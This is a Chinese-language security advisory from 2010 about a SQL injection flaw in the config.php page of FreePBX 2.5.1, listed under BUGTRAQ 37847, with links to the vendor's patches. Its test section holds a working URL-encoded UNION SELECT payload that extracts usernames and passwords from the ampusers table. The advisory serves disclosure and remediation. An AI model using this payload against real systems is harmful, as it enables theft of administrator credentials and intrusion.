FreePBX config.php页面SQL注入漏洞
来源:岁月联盟
时间:2010-01-21
FreePBX 2.5.1漏洞描述:
BUGTRAQ ID: 37847
FreePBX之前被称为Asterisk Management Portal,是IP电话工具Asterisk的标准化实现,可提供Web配置界面和其他工具。
FreePBX没有正确地过滤提交给config.php页面的extdisplay参数,远程安全者可以通过提交恶意的查询请求执行SQL注入安全。<*参考
http://marc.info/?l=full-disclosure&m=126385082917779&w=2
*>
测试方法:
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负!http://xxx.xxx.xxx.xxx/admin/config.php?display=did&didfilter=&extdisplay=12%22%20union%20select%20username,password,sections,%221%22,%222%22,%223%22,%224%22,%225%22,%226%22,%227%22,%228%22,%229%22,%2210%22,%2211%22,%2212%22%20from%20ampusers%20where%20%22%22=%22SEBUG安全建议:
厂商补丁:
FreePBX
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.freepbx.org/trac/changeset/7594
http://www.freepbx.org/trac/changeset/7640
